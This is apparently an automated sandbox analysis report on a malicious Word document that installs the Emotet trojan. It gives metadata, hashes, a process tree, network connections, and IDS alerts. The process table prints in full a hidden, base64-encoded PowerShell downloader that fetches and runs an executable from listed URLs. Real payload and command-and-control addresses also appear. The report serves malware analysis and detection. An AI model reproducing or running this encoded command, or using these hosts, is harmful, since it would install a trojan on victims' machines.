File name: | FILE_PO_01162020EX.doc |
Full analysis: | https://app.any.run/tasks/96e94eb8-591f-4887-9d4f-311a70411599 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | January 17, 2020, 14:50:20 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Vitae., Author: Louise Guerin, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Jan 16 11:05:00 2020, Last Saved Time/Date: Thu Jan 16 11:05:00 2020, Number of Pages: 2, Number of Words: 4, Number of Characters: 27, Security: 0 |
MD5: | D4F6D2E4A0EDEF8D2F5496FA469DF407 |
SHA1: | 7E3F00D4E0A3B2A561E293116DBBD0F26112A337 |
SHA256: | D8E78E236ED8030EA028EE13A3B779CE7F998A8C15E25E6E441B01544DEC5666 |
SSDEEP: | 6144:S0Rum7mdLRp1bbSBIR/EHGtCMXgTo8qoFt/etg+gLlSnx/zRiN:S0E3dxtR/iU9mvUPzzi |
.doc | | | Microsoft Word document (80) |
---|
Title: | Vitae. |
---|---|
Subject: | - |
Author: | Louise Guerin |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2020:01:16 11:05:00 |
ModifyDate: | 2020:01:16 11:05:00 |
Pages: | 2 |
Words: | 4 |
Characters: | 27 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 30 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 25 |
CompObjUserType: | Microsoft Forms 2.0 Form |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2152 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\FILE_PO_01162020EX.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3312 | Powershell -w hidden -en JABJAG4AbwByAGIAegBlAGoAbwBzAGMAcwA9ACcAWQB6AGYAZwBwAHkAbgBzAHkAJwA7ACQATQB6AGgAZAB6AHgAYgB6AGcAZQBkAGoAIAA9ACAAJwAxADIAOAAnADsAJABCAGUAdABrAHoAcQBhAHQAPQAnAEwAagBxAHMAcQBkAGwAbwBiAGgAbwB2AGIAJwA7ACQAQQBwAG4AYgBsAGEAYgByAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABNAHoAaABkAHoAeABiAHoAZwBlAGQAagArACcALgBlAHgAZQAnADsAJABYAHQAcQBnAHAAcABsAHkAegB5AHoAcABkAD0AJwBSAHEAbgB6AG8AdwBxAHcAaABrACcAOwAkAFMAdgBrAGEAZABpAGsAYwA9ACYAKAAnAG4AZQB3ACcAKwAnAC0AbwBiAGoAZQAnACsAJwBjAHQAJwApACAAbgBlAHQALgBXAGUAYgBDAEwAaQBFAE4AVAA7ACQASAB3AGgAagBhAGgAeQBpAD0AJwBoAHQAdABwADoALwAvAG4AZgBhAGEAZwByAG8ALgBjAG8AbQAvAHcAZQBiAF8AbQBhAHAALwBGAEYALwAqAGgAdAB0AHAAOgAvAC8AYgBsAG8AZwAuAGEAcgBxAHUAaQB0AGUAdABvAGYAYQBiAGkAbwBwAGEAbABoAGUAdABhAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8AdgByADEAdABtAC8AKgBoAHQAdABwADoALwAvAGUAYwByAGkAYgAuAGUALQBsAHkAZgBlAC4AYwBvAG0ALwAyADEAcgBxAHYAcwBiAC8AWABMAGsAcABUAHYAdAAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAG0AbwBlAHMAdABsAHMAdAB1AGQAaQBvAHMALgBjAG8AbQAvAGUAcgByAG8AcgAvAGsAeAA4AC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AbABvAHkAcwBzAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AdQBwAGwAbwBhAGQAcwAvAGYAbgBmADgALwAnAC4AIgBzAHAAYABsAGkAdAAiACgAJwAqACcAKQA7ACQAQwBsAG4AZgBkAG0AbQBjAHgAawA9ACcASgB6AGwAcQB1AHIAbgBoACcAOwBmAG8AcgBlAGEAYwBoACgAJABTAGYAZwBzAHoAZABlAGEAIABpAG4AIAAkAEgAdwBoAGoAYQBoAHkAaQApAHsAdAByAHkAewAkAFMAdgBrAGEAZABpAGsAYwAuACIARABvAGAAdwBuAGAAbABPAGEAZABgAEYAaQBsAGUAIgAoACQAUwBmAGcAcwB6AGQAZQBhACwAIAAkAEEAcABuAGIAbABhAGIAcgApADsAJABRAHkAaQBiAHQAYwBnAHcAagB3AGoAPQAnAE0AbQBzAHYAZAByAHEAbwBnAGQAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAdABlACcAKwAnAG0AJwApACAAJABBAHAAbgBiAGwAYQBiAHIAKQAuACIATABlAG4AYABHAGAAVABIACIAIAAtAGcAZQAgADIANwA1ADcAMwApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAFIAVAAiACgAJABBAHAAbgBiAGwAYQBiAHIAKQA7ACQASwB6AGMAcAB3AHkAbgBtAHYAbwB4AD0AJwBKAHYAYQBiAHEAdQBkAHEAeQBlAGMAdwAnADsAYgByAGUAYQBrADsAJABFAGIAagB2AHkAawBlAHIAZwB1AHQAPQAnAFMAeAByAHgAdgBzAGoAaAB1AG4AJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUABuAHkAbQB2AHoAcwBtAGkAaQBrAD0AJwBZAHMAbwBzAG8AZwBoAHEAagBrAHQAZwAnAA== | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3336 | "C:\Users\admin\128.exe" | C:\Users\admin\128.exe | — | Powershell.exe |
User: admin Integrity Level: MEDIUM Description: PromptEdit_Demo MFC Application Exit code: 0 Version: 1, 0, 0, 1 | ||||
3096 | --cb5098b5 | C:\Users\admin\128.exe | 128.exe | |
User: admin Integrity Level: MEDIUM Description: PromptEdit_Demo MFC Application Exit code: 0 Version: 1, 0, 0, 1 | ||||
2588 | "C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe" | C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe | — | 128.exe |
User: admin Integrity Level: MEDIUM Description: PromptEdit_Demo MFC Application Exit code: 0 Version: 1, 0, 0, 1 | ||||
1724 | --d6864438 | C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe | serialfunc.exe | |
User: admin Integrity Level: MEDIUM Description: PromptEdit_Demo MFC Application Version: 1, 0, 0, 1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2152 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA708.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3312 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\B7FEZ0X6C2BR25BT8HO9.temp | — | |
MD5:— | SHA256:— | |||
2152 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:0E05E68038AF8AA8C63394552B3C760D | SHA256:9FDE1B31C30474569716CC4D6BF521F6FB27A16EF872E781D1827550DC2A4A37 | |||
2152 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:57C065C449D8BDBE8737E8BAAC4E9580 | SHA256:338318F0365ED3E71A63797DE1E923710D5CA3EA4623141F225DEB0646C962DC | |||
3312 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
3312 | Powershell.exe | C:\Users\admin\128.exe | executable | |
MD5:1F93E345F9BD17E469CD494C519830CA | SHA256:9DAECBB136842D6AE4987BB723A4D00ECE34A3E5F81C5EAB3FF507F70EA88679 | |||
3096 | 128.exe | C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe | executable | |
MD5:D331AF0328EEB60550A0C52C7B3E7403 | SHA256:2D5C7C8DFF838BC19237E07DB7E1072F7A8D17C4E22E8CBB650F997091044A80 | |||
3312 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39b159.TMP | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
2152 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$LE_PO_01162020EX.doc | pgc | |
MD5:260C051957E423B7394FC4898AB9A05E | SHA256:9C8EAAD2658EC959C54D1C877EF9505B3B2AD60300849F3FB635D9B8D0E24F69 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3312 | Powershell.exe | GET | 200 | 31.22.4.72:80 | http://ecrib.e-lyfe.com/21rqvsb/XLkpTvt/ | GB | html | 82 b | unknown |
1724 | serialfunc.exe | POST | — | 100.6.23.40:80 | http://100.6.23.40/gKVKXByTvSPOiyZcv | US | — | — | malicious |
3312 | Powershell.exe | GET | 200 | 85.125.94.153:80 | http://www.moestlstudios.com/error/kx8/ | AT | executable | 332 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3312 | Powershell.exe | 31.22.4.72:80 | ecrib.e-lyfe.com | Wildcard UK Limited | GB | unknown |
3312 | Powershell.exe | 164.68.106.145:80 | blog.arquitetofabiopalheta.com | Cogent Communications | US | suspicious |
3312 | Powershell.exe | 85.125.94.153:80 | www.moestlstudios.com | Liberty Global Operations B.V. | AT | suspicious |
1724 | serialfunc.exe | 100.6.23.40:80 | — | MCI Communications Services, Inc. d/b/a Verizon Business | US | malicious |
Domain | IP | Reputation |
---|---|---|
nfaagro.com |
| suspicious |
blog.arquitetofabiopalheta.com |
| unknown |
ecrib.e-lyfe.com |
| unknown |
www.moestlstudios.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
3312 | Powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3312 | Powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3312 | Powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
1724 | serialfunc.exe | A Network Trojan was detected | ET TROJAN Win32/Emotet CnC Activity (POST) M5 |
1724 | serialfunc.exe | A Network Trojan was detected | ET TROJAN Win32/Emotet CnC Activity (POST) M6 |
1724 | serialfunc.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |